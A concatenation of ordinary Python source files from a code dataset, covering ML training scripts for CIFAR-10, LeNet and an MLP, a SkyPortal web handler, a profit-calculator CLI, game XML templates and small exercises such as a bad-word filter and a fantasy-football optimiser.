trainer.EventBasedLE import EventBasedLearningEpochStopper\n\n\ndef combine_result(h, h_training_epoch):\n h.history['acc'] += h_training_epoch.history['acc']\n h.history['loss'] += h_training_epoch.history['loss']\n h.history['val_acc'] += h_training_epoch.history['val_acc']\n h.history['val_loss'] += h_training_epoch.history['val_loss']\n return h;\n\ndef main(job_dir,**args):\n NUM_CLASSES = {'mnist': 10, 'svhn': 10, 'cifar-10': 10, 'cifar-100': 100}\n dataset = \"cifar-10\"\n X_train, y_train, X_test, y_test, un_selected_index = get_data(dataset, random_shuffle=False)\n\n\n image_shape = X_train.shape[1:]\n model = get_model(dataset, input_tensor=None, input_shape=image_shape, num_classes=NUM_CLASSES[dataset])\n optimizer = SGD(lr=0.01, decay=0, momentum=0)\n\n\n datagen = ImageDataGenerator(\n featurewise_center = False, # set input mean to 0 over the dataset\n samplewise_center = False, # set each sample mean to 0\n featurewise_std_normalization = False, # divide inputs by std of the dataset\n samplewise_std_normalization = False, # divide each input by its std\n zca_whitening = False, # apply ZCA whitening\n rotation_range = 0, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range = 0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range = 0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip = True, # randomly flip images\n vertical_flip = False, # randomly flip images\n )\n datagen.fit(X_train)\n\n epochs_training = 60\n total_epoch_training = 300\n batch_size = 128\n training_steps = 10000\n un_selected_index = range(X_train.shape[0])\n steps = int(np.floor(len(un_selected_index) / training_steps))\n\n\n sub_un_selected_list = un_selected_index[0:training_steps]\n X_clean_iteration = X_train[sub_un_selected_list]\n y_clean_iteration = y_train[sub_un_selected_list]\n model.compile(loss='categorical_crossentropy',\n optimizer=optimizer,\n metrics=['acc'])\n h = model.fit_generator(datagen.flow(X_clean_iteration, y_clean_iteration, batch_size=batch_size),\n steps_per_epoch=X_clean_iteration.shape[0]//batch_size, epochs=epochs_training,\n validation_data=(X_test, y_test), callbacks = [LossLearningRateScheduler(base_lr = 0.01, kd_coef = 5, loss_zero = 0, eventbasedLR = True), EventBasedLearningEpochStopper(alpha_threshold = -0.001, loss_zero = 0, lookbackward_epoch = 5, accumulated_epoch = 0, limit_epoch = total_epoch_training, ending_epoch = 10)]\n )\n round = 0\n turn = 1\n while len(h.history['loss']) < total_epoch_training:\n for i in np.arange(1, steps):\n turn += 1\n if len(h.history['loss']) >= total_epoch_training:\n break\n if i == 0 and round != 0:\n sub_un_selected_list = un_selected_index[0:training_steps]\n if i != steps - 1:\n sub_un_selected_list = un_selected_index[i*training_steps:(i+1)*training_steps]\n else:\n sub_un_selected_list = un_selected_index[i*training_steps:]\n\n X_clean_iteration = X_train[sub_un_selected_list]\n y_clean_iteration = y_train[sub_un_selected_list]\n\n model.compile(loss='categorical_crossentropy',\n optimizer=optimizer,\n metrics=['acc'])\n h_training_epoch = model.fit_generator(datagen.flow(X_clean_iteration, y_clean_iteration, batch_size=batch_size),\n steps_per_epoch=X_clean_iteration.shape[0]//batch_size, epochs=epochs_training,\n validation_data=(X_test, y_test), callbacks = [LossLearningRateScheduler(base_lr = 0.01, kd_coef = 5, loss_zero = h.history['loss'][0], eventbasedLR = True), EventBasedLearningEpochStopper(alpha_threshold = -0.001, loss_zero = h.history['loss'][0], lookbackward_epoch = 5, accumulated_epoch = len(h.history['loss']), limit_epoch = total_epoch_training, ending_epoch = 10)]\n )\n h = combine_result(h, h_training_epoch)\n\n round += 1\n print(turn)\n return h.history\n\n\n\n\n##Running the app\nif __name__ == \"__main__\":\n result_history = main()\n np.save('result_history.npy', result_history)\n","sub_path":"task-D-EB-EPD-local.py","file_name":"task-D-EB-EPD-local.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"86846825","text":"import json\nimport logging\nfrom data_loader import DataLoader\nfrom model import LeNet\nfrom trainer import Trainer \n\ndef main():\n\twith open(\"config.json\", \"r\") as f:\n\t\tconfig = json.load(f)\n\n\t# Load Cifar data \n\tdata = DataLoader(config)\n\n\t# Create LeNet model\n\tnet = LeNet(config)\n\n\t# Create trainer\n\ttrainer = Trainer(net.model, data, config)\n\n\t# # Train model\n\t# trainer.train()\n\n\t# # Save LeNet model weights\n\t# trainer.save_weights()\n\n\t# Load weights\n\tload_path = self.config[\"trainer\"][\"save_dir\"] + self.config[\"experiment_name\"] + \\\n\t\t\t\"/\" + self.config[\"trainer\"][\"save_trained_name\"] + \"_full.hdf5\"\n\ttrainer.load_weights(load_path)\n\n\t# Evaluate validation set\n\ttrainer.evaluate()\n\nif __name__ == '__main__':\n\tlogging.basicConfig(level=logging.INFO, format='%(levelname)s:%(name)s: %(message)s')\n\n\tmain()","sub_path":"LeNet/Keras/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"596534073","text":"import sys\nimport re\n\nf_txt = open(\"badwords.txt\", 'r')\nbadWords = [line.rstrip('\\n').lower() for line in f_txt]\nf_txt.close()\n\nsample = input(\"Enter something you asshole: \").lower()\n\nmatching = [s for s in badWords if re.search(\"\\\\b\" + re.escape(s) + \"\\\\b\", sample.lower())]\nif(matching):\n\tprint(\"{} whatever\".format(set(matching)))","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"496994390","text":"\"\"\"Categorize Otto Group sales.\"\"\"\n\nfrom sklearn.pipeline import Pipeline\nfrom pandas import read_csv\n# from pandas.plotting import scatter_matrix\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport os\n\nfrom autoclf.classification import eval_utils as eu\nfrom autoclf.classification import evaluate as eva\nimport autoclf.getargs as ga\nfrom pkg_resources import resource_string\nfrom io import StringIO\n\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\n\n# starting program\nif __name__ == '__main__':\n\n print(\"### Probability Calibration Experiment 'Otto Group' \"\n \"-- CalibratedClassifierCV with cv=cv (no prefit) ###\")\n print()\n\n d_name = ga.get_name()\n\n if d_name is None:\n d_name = \"OttoG\"\n\n seed = 7\n np.random.seed(seed)\n\n # place your code here\n try:\n df = read_csv(\"datasets/otto_group_train.csv\", delimiter=\",\")\n except FileNotFoundError as fe:\n ottog_bytes = resource_string(\n \"autoclf\", os.path.join(\"datasets\", 'otto_group_train.csv'))\n ottog_file = StringIO(str(ottog_bytes,'utf-8'))\n\n df = read_csv(ottog_file, delimiter=\",\")\n except Exception as e:\n raise e\n \n df_length = len(df.index)\n\n ###\n df = df.drop(['id'], axis=1)\n print(df.shape)\n\n description = df.describe()\n print(\"Description - no encoding:\\n\", description)\n\n print()\n\n target = 'target'\n\n # feature engineering\n\n sltt = eu.scoring_and_tt_split(df, target, 0.2, seed)\n\n X_train, X_test, y_train, y_test = sltt['arrays']\n scoring = sltt['scoring']\n Y_type = sltt['target_type']\n labels = sltt['labels']\n\n print()\n print(\"X_train shape: \", X_train.shape)\n print(\"X_train -- first row:\", X_train.values[0])\n print(\"y_train shape: \", y_train.shape)\n print()\n\n print(\"X_test shape: \", X_test.shape)\n print(\"X_test -- first row:\", X_test.values[0])\n print(\"y_test shape: \", y_test.shape)\n print()\n\n print(y_train[:3])\n # input(\"Enter key to continue... \\n\")\n\n print()\n print(\"scoring:\", scoring)\n print()\n\n auto_feat_eng_data = eu.auto_X_encoding(sltt, seed)\n\n print()\n\n eva.perform_classic_cv_evaluation_and_calibration(\n auto_feat_eng_data, scoring, Y_type, labels, d_name, seed)\n\n input(\"=== [End Of Program] Enter key to continue... \\n\")\n","sub_path":"examples/ottog_train.py","file_name":"ottog_train.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"162193132","text":"from data.xml.templates.XMLEffectl import XMLEffect\nfrom data.xml.templates.XMLTemplate import XMLTemplate, XElement, XAttribElement, XInstance\nfrom structure.enums.Items import Items\nfrom structure.enums.Races import Races\nfrom structure.enums.WeaponWeight import WeaponWeight\n\n\nclass XMLThrowableWeapon(XMLTemplate):\n ROOT_NAME = 'throwableWeapon'\n OBJECT_TYPE = Items.THROWABLE_WEAPON\n\n\n def __init__(self):\n self.id = XElement('id')\n self.parent_id = XElement('parentId')\n self.name = XAttribElement('name', 'lang')\n self.description = XAttribElement('description', 'lang')\n self.price = XElement('price')\n self.weight = XElement('weight')\n self.initiative = XElement('initiative')\n self.strength = XElement('strength')\n self.rampancy = XElement('rampancy')\n self.rangeLow = XElement('rangeLow')\n self.rangeMedium = XElement('rangeMedium')\n self.amount = XElement('amount')\n self.rangeHigh = XElement('rangeHigh')\n self.defence = XElement('defence')\n\n self.weaponWeight = XElement('weaponWeight', WeaponWeight)\n self.racial = XElement('racial', Races)\n\n self.effects = XInstance('effects', XMLEffect)\n","sub_path":"Program/data/xml/templates/XMLThrowableWeapon.py","file_name":"XMLThrowableWeapon.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"633386188","text":"def uak(x,y,z):\n\tx=1\n\twhile x>0:\n\t\ty=input('Kode : n. Kembali ke menu awal; m. Keluar\\nPilihan anda : ')\n\t\tif y=='n':\n\t\t\tprint('\\x1bc')\n\t\t\tloading()\n\t\t\tx=-1\n\t\telif y=='m':\n\t\t\tquit()\n\t\telse:\n\t\t\tprint('\\x1bc')\n\t\t\tz()\n\t\t\tx=x+1\n\ndef loading():\n\tld=1\n\twhile ld<=50:\n\t\tprint('\\x1bc');print('='*ld);time.sleep(0.004)\n\t\tld=ld+1\n\t\tprint('\\x1bc')\n#IMPORT\nprint('\\x1bc')\nimport time\nimport math\n#ALAT\ndef k():\n\tprint('\\nkode :\\na. tambah\\ns. kali\\nl. lanjut\\nPilihan anda : ')\ndef res():\n\tprint('\\x1bc')\n\tprint('Uang masuk sejumlah Rp',masuk)\ndef res1():\n\tprint('\\x1bc')\n\tprint('Total saldo sejumlah Rp',tosal)\ndef res2():\n\tprint('\\x1bc')\n\tprint('Sisa saldo sejumlah Rp',sisal)\n#MENU AWAL\nprint('\\x1bc');print('S ### ###');print('E # # # #');print('L # # # # # #');print('A # # # #');print('M ##### #####');print('A');print('T ');print(' #################');print('D # #');print('A # #');print('T ## ##');print('A #######');print('N');print('G')\ntime.sleep(0.6)\nprint('\\x1bc');print('M ###');print('E # # ### #');print('T # # # # # #');print('A # # #');print('A #####');print('A');print(' ');print(' #################');print(' # #');print('A # #');print(' ## ##');print('A #######');print('');print('G')\ntime.sleep(0.2)\nprint('\\x1bc');print('M ### ###');print('I # # # #');print('T # # # # # #');print('R # # # #');print('A ##### #####');print('');print(' ');print(' #################');print(' # #');print(' # #');print(' ## ##');print(' #######');print('');print('')\ntime.sleep(0.6)\nprint('\\x1bc');print('MITRA TOKOPEDIA ASISTANT\\nmetode penghitungan semi otomatis untuk mitra')\ntime.sleep(2.5)\nmn=1\nwhile mn>0:\n\tprint('\\x1bc')\n\tprint('^<^ : MENU UTAMA\\n\\nAda yang bisa kami bantu?\\n\\nkode :\\n1. Menghitung keuntungan\\n2. Statistik keuntungan\\n3. Intruksi penggunaan\\n4. Tentang pembuat\\n5. Keluar')\n\tmenu=input('Pilihan anda : ')\n\tif menu=='1':\n#MENU PERTAMA\n\t\t#UANG MASUK\n\t\tloading()\n\t\tawal=1\n\t\twhile awal>0:\n\t\t\tmasuk=int(input('MASUKKAN UANG MASUK\\nRp'))\n\t\t\tk()\n\t\t\thit=1\n\t\t\twhile hit>0:\n\t\t\t\tpencet=input('')\n\t\t\t\tif pencet=='a':\n\t\t\t\t\tmasuk1=int(input('Rp'))\n\t\t\t\t\tmasuk=masuk+masuk1\n\t\t\t\t\tres()\n\t\t\t\t\thit=hit+1\n\t\t\t\t\tk()\n\t\t\t\telif pencet=='s':\n\t\t\t\t\tmasuk1=int(input('Rp'))\n\t\t\t\t\tmasuk=masuk*masuk1\n\t\t\t\t\tres()\n\t\t\t\t\thit=hit+1\n\t\t\t\t\tk()\n\t\t\t\telif pencet=='l':\n\t\t\t\t\tloading()\n\t\t\t\t\t#TOTAL SALDO\n\t\t\t\t\ttosal=int(input('MASUKKAN TOTAL SALDO\\nRp'))\n\t\t\t\t\tk()\n\t\t\t\t\thit2=1\n\t\t\t\t\twhile hit2>0:\n\t\t\t\t\t\tpencet=input('')\n\t\t\t\t\t\tif pencet=='a':\n\t\t\t\t\t\t\ttosal1=int(input('Rp'))\n\t\t\t\t\t\t\ttosal=tosal+tosal1\n\t\t\t\t\t\t\tres1()\n\t\t\t\t\t\t\thit2=hit2+1\n\t\t\t\t\t\t\tk()\n\t\t\t\t\t\telif pencet=='s':\n\t\t\t\t\t\t\ttosal1=int(input('Rp'))\n\t\t\t\t\t\t\ttosal=tosal*tosal1\n\t\t\t\t\t\t\tres1()\n\t\t\t\t\t\t\thit2=hit2+1\n\t\t\t\t\t\t\tk()\n\t\t\t\t\t\telif pencet=='l':\n\t\t\t\t\t\t\tloading()\n\t\t\t\t\t\t\t#SISA SALDO\n\t\t\t\t\t\t\tsisal= int(input('MASUKKAN SISA SALDO\\nRp'))\n\t\t\t\t\t\t\tk()\n\t\t\t\t\t\t\thit3=1\n\t\t\t\t\t\t\twhile hit3>0:\n\t\t\t\t\t\t\t\tpencet=input('')\n\t\t\t\t\t\t\t\tif pencet=='a':\n\t\t\t\t\t\t\t\t\tsisal1=int(input('Rp'))\n\t\t\t\t\t\t\t\t\tsisal=sisal+sisal1\n\t\t\t\t\t\t\t\t\tres2()\n\t\t\t\t\t\t\t\t\thit3=hit3+1\n\t\t\t\t\t\t\t\t\tk()\n\t\t\t\t\t\t\t\telif pencet=='s':\n\t\t\t\t\t\t\t\t\tsisal1=int(input('Rp'))\n\t\t\t\t\t\t\t\t\tsisal=sisal*sisal1\n\t\t\t\t\t\t\t\t\tres2()\n\t\t\t\t\t\t\t\t\thit3=hit3+1\n\t\t\t\t\t\t\t\t\tk()\n\t\t\t\t\t\t\t\telif pencet=='l':\n\t\t\t\t\t\t\t\t\tloading()\n\t\t\t\t\t\t\t\t\t#OPERASI HITUNG\n\t\t\t\t\t\t\t\t\tdef oph():\n\t\t\t\t\t\t\t\t\t\tprint('\\x1bc')\n\t\t\t\t\t\t\t\t\t\tprint('\\nJADI,\\nUang masuk = Rp',masuk,'\\nTotal saldo = Rp',tosal,'\\nSisa saldo = Rp',sisal)\n\t\t\t\t\t\t\t\t\t\tprint('\\nMAKA,\\nPendapatan = Rp', masuk,'\\nPengeluaran = Rp', tosal-sisal,'\\nUntung = Rp', masuk-(tosal-sisal),'\\n\\n*Silahkan catat di buku catatan\\n')\n\t\t\t\t\t\t\t\t\toph()\n\t\t\t\t\t\t\t\t\t#AKHIRI/ULANGI SESI\n\t\t\t\t\t\t\t\t\tuak(1,2,oph)\n\t\t\t\t\t\t\t\t\thit3=-1\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tres2()\n\t\t\t\t\t\t\t\t\tk()\n\t\t\t\t\t\t\t\t\thit3=hit3+1\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\thit2=-1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tres1()\n\t\t\t\t\t\t\tk()\n\t\t\t\t\t\t\thit2=hit2+1\n\t\t\t\t\telse:\n\t\t\t\t\t\thit=-1\n\t\t\t\telse:\n\t\t\t\t\tres()\n\t\t\t\t\tk()\n\t\t\t\t\thit=hit+1\n\t\t\telse:\n\t\t\t\tawal=-1\n\t\telse:\n\t\t\tmn=mn+1\n\telif menu=='2':\n\t\tloading()\n#MENU KEDUA\n\t\tvar1=float(input('Keuntungan pada bulan pertama : Rp'))\n\t\tvar2=float(input('Keuntungan pada bulan kemarin : Rp'))\n\t\tvar3=float(input('Keuntungan pada bulan sekarang : Rp'))\n\t\tnilaimx=max(var1,var2,var3)\n\t\tvar4=((var3/var1))*100-100\n\t\tvar5=((var3/var2))*100-100\n\t\tloading()\n\t\tdef aou2():\n\t\t\tprint('MAKA,\\nKenaikan untung terhadap bulan pertama : ',var4,' %')\n\t\t\tprint('Kenaikan untung terhadap bulan kemarin : ',var5, ' %')\n\t\t\tsttvar1=round((var1/nilaimx)*50)\n\t\t\tsttvar2=round((var2/nilaimx)*50)\n\t\t\tsttvar3=round((var3/nilaimx)*50)\n\t\t\tprint('Untung bulan pertama : \\n'+']'*sttvar1,'\\n')\n\t\t\tprint('Untung bulan kemarin : \\n'+']'*sttvar2,'\\n')\n\t\t\tprint('Untung bulan sekarang : \\n'+']'*sttvar3,'\\n')\n\t\t\tprint('\\n*Silahkan catat di buku catatan\\n')\n\t\taou2()\n\t\t#AKHIRI/ULANGI SESI\n\t\tuak(3,4,aou2)\n\t\tmn=mn+1\n#MENU KETIGA\n\telif menu=='3':\n\t\tloading()\n\t\tdef aou3():\n\t\t\tprint('^<^ : INTRUKSI PENGGUNAAN\\n');print('Hanya masukkan angka pada saat memasukkan nilai uang\\nJika dilanggar : akan muncul EROR\\n\\nHanya masukkan kode yang ada di dalam list kode\\nJika dilanggar : perintah tidak akan tersampaikan')\n\t\taou3()\n\t\t#AKHIRI/ULANGI SESI\n\t\tprint('\\n'*6)\n\t\tuak(5,6,aou3)\n\t\tmn=mn+1\n#MENU KEEMPAT\n\telif menu=='4':\n\t\tloading()\n\t\tdef aou4():\n\t\t\tprint('^<^ : TENTANG PEMBUAT\\n');print('Gmail : hamdanduaenamprog@gmail.com\\n\\nGithub : HamdanProg\\n\\nFacebook : Bang Hamdan')\n\t\taou4()\n\t\t#AKHIRI/ULANGI SESI\n\t\tprint('\\n'*6)\n\t\tuak(7,8,aou4)\n\t\tmn=mn+1\n#MENU KELIMA\n\telif menu=='5':\n\t\tquit()\n#ELSE\n\telse:\n\t\tmn=mn+1","sub_path":"MTPAv2.4.py","file_name":"MTPAv2.4.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"233218665","text":"import tornado.web\nfrom sqlalchemy.orm import joinedload\nfrom sqlalchemy import func\nimport arrow\nfrom functools import reduce\nfrom marshmallow.exceptions import ValidationError\nfrom baselayer.app.access import permissions, auth_or_token\nfrom .base import BaseHandler\nfrom ..models import (DBSession, Comment, Instrument, Photometry, Source,\n Thumbnail, GroupSource, Token, User)\n\n\nSOURCES_PER_PAGE = 100\n\n\nclass SourceHandler(BaseHandler):\n @auth_or_token\n def get(self, source_id=None):\n \"\"\"\n ---\n single:\n description: Retrieve a source\n parameters:\n - in: path\n name: source_id\n required: false\n schema:\n type: integer\n responses:\n 200:\n content:\n application/json:\n schema: SingleSource\n 400:\n content:\n application/json:\n schema: Error\n multiple:\n description: Retrieve all sources\n parameters:\n - in: query\n name: page\n schema:\n type: integer\n description: Queries are limited to 100 per page. This selects the page to download.\n responses:\n 200:\n content:\n application/json:\n schema: ArrayOfSources\n 400:\n content:\n application/json:\n schema: Error\n \"\"\"\n info = {}\n page_number = self.get_query_argument('page', None)\n if source_id:\n info['sources'] = Source.get_if_owned_by(\n source_id, self.current_user,\n options=[joinedload(Source.comments),\n joinedload(Source.thumbnails)\n .joinedload(Thumbnail.photometry)\n .joinedload(Photometry.instrument)\n .joinedload(Instrument.telescope)])\n elif page_number:\n page = int(page_number)\n q = Source.query.filter(Source.id.in_(DBSession.query(\n GroupSource.source_id).filter(GroupSource.group_id.in_(\n [g.id for g in self.current_user.groups]))))\n all_matches = q.all()\n info['totalMatches'] = len(all_matches)\n info['sources'] = all_matches[\n ((page - 1) * SOURCES_PER_PAGE):(page * SOURCES_PER_PAGE)]\n info['pageNumber'] = page\n info['sourceNumberingStart'] = (page - 1) * SOURCES_PER_PAGE + 1\n info['sourceNumberingEnd'] = min(info['totalMatches'],\n page * SOURCES_PER_PAGE)\n info['lastPage'] = info['totalMatches'] <= page * SOURCES_PER_PAGE\n if info['totalMatches'] == 0:\n info['sourceNumberingStart'] = 0\n else:\n if isinstance(self.current_user, Token):\n token = self.current_user\n info['sources'] = list(reduce(\n set.union, (set(group.sources) for group in token.groups)))\n else:\n info['sources'] = self.current_user.sources\n\n if info['sources'] is not None:\n return self.success(data=info)\n else:\n return self.error(f\"Could not load source {source_id}\",\n data={\"source_id\": source_id_or_page_num})\n\n @permissions(['Manage sources'])\n def post(self):\n \"\"\"\n ---\n description: Upload a source\n parameters:\n - in: path\n name: source\n schema: Source\n responses:\n 200:\n content:\n application/json:\n schema:\n allOf:\n - Success\n - type: object\n properties:\n id:\n type: integer\n description: New source ID\n \"\"\"\n data = self.get_json()\n\n s = Source(ra=data['sourceRA'], dec=data['sourceDec'],\n redshift=data.get('redshift'))\n DBSession().add(s)\n DBSession().commit()\n\n return self.success(data={\"id\": s.id}, action='cesium/FETCH_SOURCES')\n\n @permissions(['Manage sources'])\n def put(self, source_id):\n \"\"\"\n ---\n description: Update a source\n parameters:\n - in: path\n name: source\n schema: Source\n responses:\n 200:\n content:\n application/json:\n schema: Success\n 400:\n content:\n application/json:\n schema: Error\n \"\"\"\n data = self.get_json()\n data['id'] = source_id\n\n schema = Source.__schema__()\n try:\n schema.load(data)\n except ValidationError as e:\n return self.error('Invalid/missing parameters: '\n f'{e.normalized_messages()}')\n DBSession().commit()\n\n return self.success(action='cesium/FETCH_SOURCES')\n\n @permissions(['Manage sources'])\n def delete(self, source_id):\n \"\"\"\n ---\n description: Delete a source\n parameters:\n - in: path\n name: source\n schema:\n Source\n responses:\n 200:\n content:\n application/json:\n schema: Success\n \"\"\"\n s = Source.query.get(source_id)\n DBSession().delete(s)\n DBSession().commit()\n\n return self.success(action='cesium/FETCH_SOURCES')\n\n\nclass FilterSourcesHandler(BaseHandler):\n @auth_or_token\n def post(self):\n data = self.get_json()\n info = {}\n page = int(data.get('pageNumber', 1))\n info['pageNumber'] = page\n q = Source.query.filter(Source.id.in_(DBSession.query(\n GroupSource.source_id).filter(GroupSource.group_id.in_(\n [g.id for g in self.current_user.groups]))))\n\n if data['sourceID']:\n q = q.filter(Source.id.contains(data['sourceID'].strip()))\n if data['ra'] and data['dec'] and data['radius']:\n ra = float(data['ra'])\n dec = float(data['dec'])\n radius = float(data['radius'])\n q = q.filter(Source.ra <= ra + radius)\\\n .filter(Source.ra >= ra - radius)\\\n .filter(Source.dec <= dec + radius)\\\n .filter(Source.dec >= dec - radius)\n if data['startDate']:\n start_date = arrow.get(data['startDate'].strip())\n q = q.filter(Source.last_detected >= start_date)\n if data['endDate']:\n end_date = arrow.get(data['endDate'].strip())\n q = q.filter(Source.last_detected <= end_date)\n if data['simbadClass']:\n q = q.filter(func.lower(Source.simbad_class) ==\n data['simbadClass'].lower())\n if data['hasTNSname']:\n q = q.filter(Source.tns_name.isnot(None))\n\n all_matches = list(q)\n info['totalMatches'] = len(all_matches)\n info['sources'] = all_matches[\n ((page - 1) * SOURCES_PER_PAGE):(page * SOURCES_PER_PAGE)]\n info['lastPage'] = info['totalMatches'] <= page * SOURCES_PER_PAGE\n info['sourceNumberingStart'] = (page - 1) * SOURCES_PER_PAGE + 1\n info['sourceNumberingEnd'] = min(info['totalMatches'],\n page * SOURCES_PER_PAGE)\n if info['totalMatches'] == 0:\n info['sourceNumberingStart'] = 0\n\n return self.success(data=info)\n","sub_path":"skyportal/handlers/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":7709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"250254655","text":"\"\"\"Checks community branch dir structure to see who submitted most\r\n and what challenge is more popular by number of PRs\"\"\"\r\nfrom collections import Counter, namedtuple\r\nimport os\r\nimport urllib.request\r\nimport re\r\n\r\n# prep\r\ntmp = os.getenv(\"TMP\", \"/tmp\")\r\ntempfile = os.path.join(tmp, 'dirnames')\r\nurllib.request.urlretrieve(\r\n 'https://bites-data.s3.us-east-2.amazonaws.com/dirnames.txt',\r\n tempfile\r\n)\r\n\r\nIGNORE = 'static templates data pybites bbelderbos hobojoe1848'.split()\r\n\r\nusers, popular_challenges = Counter(), Counter()\r\n\r\nStats = namedtuple('Stats', 'user challenge')\r\n\r\n\r\n# code\r\n\r\ndef gen_files():\r\n \"\"\"Return a generator of dir names reading in tempfile\r\n\r\n tempfile has this format:\r\n\r\n challenge/file_or_dir,is_dir\r\n 03/rss.xml,False\r\n 03/tags.html,False\r\n ...\r\n 03/mridubhatnagar,True\r\n 03/aleksandarknezevic,True\r\n\r\n -> use last column to filter out directories (= True)\r\n \"\"\"\r\n for line in open(tempfile):\r\n if 'True' in line:\r\n yield re.search(r'/(.*),' ,line).group(1)\r\n\r\n\r\ndef diehard_pybites():\r\n \"\"\"Return a Stats namedtuple (defined above) that contains the user that\r\n made the most PRs (ignoring the users in IGNORE) and a challenge tuple\r\n of most popular challenge and the amount of PRs for that challenge.\r\n Calling this function on the dataset (held tempfile) should return:\r\n Stats(user='clamytoe', challenge=('01', 7))\r\n \"\"\"\r\n Stats = namedtuple('Stats', 'user, challenge')\r\n challenges = list()\r\n users = [x for x in gen_files() if x not in IGNORE]\r\n for line in open(tempfile):\r\n if any(word in re.search(r'/(.*),' ,line).group(1) for word in IGNORE):\r\n continue\r\n elif 'True' in line:\r\n challenges.append(re.search(r'^(.*)/' ,line).group(1))\r\n challenges = Counter(challenges)\r\n users = Counter(users)\r\n high_user = users.most_common(1)[0][0]\r\n high_challenge = challenges.most_common(1)[0]\r\n return Stats(user=high_user, challenge=high_challenge)\r\n","sub_path":"6/pcc_stats.py","file_name":"pcc_stats.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"117265866","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.callbacks import EarlyStopping\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, explained_variance_score, r2_score\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nearly_stopper = EarlyStopping(patience=5)\n\ndef compile_model(network, input_shape):\n \"\"\"\n\n :param network dict: dictionary with network parameters\n :param input_shape tuple: tuple with tradin data shape\n :return: compiled model\n \"\"\"\n\n nb_layers = network.get('n_layers', 2)\n nb_neurons = network.get('n_neurons', 10)\n activation = network.get('activations', 'linear')\n optimizer = network.get('optimizers', 'adam')\n\n model = Sequential()\n\n model.add(Dense(nb_neurons, activation=activation, input_shape=input_shape))\n model.add(Dropout(network.get('dropout', 1)))\n for i in range(nb_layers - 1):\n model.add(Dense(nb_neurons, activation=activation))\n model.add(Dropout(network.get('dropout', 1)))\n\n model.add(Dense(\n network.get('last_layer_neurons', 1),\n activation=network.get('last_layer_activations', 'linear'),\n ))\n\n model.compile(loss=network.get('losses', 'mse'), optimizer=optimizer)\n\n return model\n\n\ndef train_and_score(network, x_train, y_train, x_test, y_test):\n \"\"\"\n\n :param network dict: dictionary with network parameters\n :param x_train array: numpy array with features for traning\n :param y_train array: numpy array with labels for traning\n :param x_test array: numpy array with labels for test\n :param y_test array: numpy array with labels for test\n :return float: score\n \"\"\"\n\n model = compile_model(network, (x_train.shape[1],))\n\n model.fit(x_train, y_train,\n batch_size=network.get('batch_size', 128),\n epochs=10, # using early stopping, so no real limit\n verbose=network.get('verbose', 0))\n #validation_data=(x_test, y_test),\n #callbacks=[early_stopper])\n\n #score = model.evaluate(x_test, y_test, verbose=0)\n \n y_pred = model.predict(np.array(x_test))\n y_pred = np.concatenate(y_pred)\n\n true = y_test\n pred = y_pred\n\n print(' R2 = ', r2_score(true, pred))\n\n return r2_score(true, pred), model\n","sub_path":"MLP_regression_evolution/mlp_train.py","file_name":"mlp_train.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"603644823","text":"import json\nimport pandas as pd\nfrom a4_optimise.optimise import select_team\nfrom a0_helpers.constants import DIR_DATA_RAW_BOOTSTRAP\n\npd.options.display.width = 250\npd.options.display.max_columns = 25\n\nHISTORY_PAST = 'history_past' # History Previous Seasons\nFIELDS_META = ['code', 'first_name', 'second_name', 'team_name', 'player_position', 'now_cost']\nFIELD_FEATURE = ['total_points']\nFIELD_PRED = ['points_predicted']\n\n\ndef combine(df_players, df_teams, df_positions):\n df_teams = df_teams[['code', 'name']]\n df_teams.columns = ['team_code', 'team_name']\n df_positions = df_positions[['id', 'singular_name_short']]\n df_positions.columns = ['element_type', 'player_position']\n df_week = df_players.merge(df_teams, on='team_code').merge(df_positions, on='element_type')\n return df_week\n\n\ndef transform_boostrap(dir_data_raw_hist):\n list_df = []\n for file_path in dir_data_raw_hist.iterdir():\n print(f'Processing file {file_path.name}')\n with open(file_path, encoding=\"utf8\") as file_in:\n bootstrap_json = json.loads(file_in.read())\n\n df_players = pd.DataFrame(bootstrap_json['elements'])\n df_teams = pd.DataFrame(bootstrap_json['teams'])\n df_positions = pd.DataFrame(bootstrap_json['element_types'])\n\n df_week = combine(df_players, df_teams, df_positions)\n df_week[FIELD_PRED] = df_week[FIELD_FEATURE] / 38\n df_final = df_week[FIELDS_META + FIELD_PRED]\n\n list_df.append(df_final)\n\n df_boostrap = pd.concat(list_df)\n return df_boostrap\n\n\ndef main():\n df_boostrap = transform_boostrap(DIR_DATA_RAW_BOOTSTRAP)\n # df_boostrap.to_csv('output.csv', index=False, encoding='utf-8-sig')\n df_team = select_team(df_boostrap)\n print(df_team)\n\n\nif __name__ == '__main__':\n 